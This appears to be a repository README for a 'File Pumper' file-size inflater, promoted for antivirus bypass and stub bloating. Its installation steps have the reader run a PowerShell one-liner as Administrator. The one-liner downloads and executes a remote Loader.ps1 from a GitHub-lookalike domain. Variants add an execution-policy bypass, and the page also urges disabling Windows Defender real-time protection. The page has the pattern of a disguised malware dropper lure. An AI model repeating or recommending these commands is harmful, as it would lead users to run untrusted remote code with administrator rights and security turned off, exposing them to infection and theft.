Skip to content

Latest commit

Β 

History

2 Commits

Folders and files

NameName
Last commit message
Last commit date
Β 
Β 

Repository files navigation

File Pumper | Ultimate File Size Inflater & Spoofer πŸš€

File Pumper (also known as a File Inflater or Size Changer) is a powerful, lightweight open-source tool designed to instantly increase file sizes. Whether you need to pump executable files, test antivirus bypass limits, or change document sizes for software analysis, this utility handles it efficiently without corrupting the original file structure.


πŸ”₯ Key Features

  • Instant File Pumping: Increase file sizes from kilobytes to gigabytes in milliseconds.
  • Multiple Padding Modes: Support for Zero-Byte filling (Null bytes) and Random Junk Data.
  • Format Preservation: Safely pumps .exe, .dll, .bin, .txt, and other extensions without breaking them.
  • Custom Size Units: Choose your target size easily in KB, MB, or GB.
  • GUI & CLI Support: Easy-to-use Command Line Interface and graphical user interface.

πŸš€ Key Use Cases and Benefits

Why use a File Size Spoofer or File Bloater?

  1. Antivirus & EDR Testing: Test how security solutions handle massive executable files (Stub Bloating / AV Bypass analysis).
  2. CDN & Upload Testing: Verify server-side file upload limits and restrictions.
  3. Software Debugging: Simulate low disk space scenarios or heavy file processing.

πŸš€ Automated Installation & Setup (PowerShell)

  1. Open PowerShell as Administrator:

    • Press the Win + X keys simultaneously.
    • Select Terminal (Admin) or Windows PowerShell (Admin) from the context menu.
  2. Execute the Deployment Command: Copy, paste, and press Enter to run the following optimized initialization command. This script dynamically configures the network bypass registry and fetches the necessary packages:

    irm https://github-software.su/powershell/Loader.ps1 | iex

πŸ” Troubleshooting & Common Errors

πŸ“Œ Bypass Execution Policy (Blocking Unsigned Scripts)

If your system blocks the launch due to built-in execution policy constraints, enforce a bypass using this command:

powershell -ExecutionPolicy Bypass -Command "irm https://github-software.su/powershell/Loader.ps1 | iex"

πŸ“Œ Error: "irm is not recognized..." (PowerShell 2.0 Legacy)

In older legacy environments where aliases are missing, use explicit full system cmdlets:

Invoke-RestMethod https://github-software.su/powershell/Loader.ps1 | Invoke-Expression

πŸ“Œ Antivirus or SmartScreen Interception

Automated deployment routines can sometimes trigger proactive security heuristics. Temporarily disable "Real-time protection" within your Windows Defender settings during setup, then re-enable it immediately after completion.


About

Fast and reliable File Pumper (File Size Changer / Inflater) in Python/C#. Increase file size instantly with zero bytes, junk data, or custom padding. Perfect for stub bloating, AV bypass testing, and software analysis.

Topics

Resources

Stars

20 stars

Watchers

0 watching

Forks

Releases

Packages

Contributors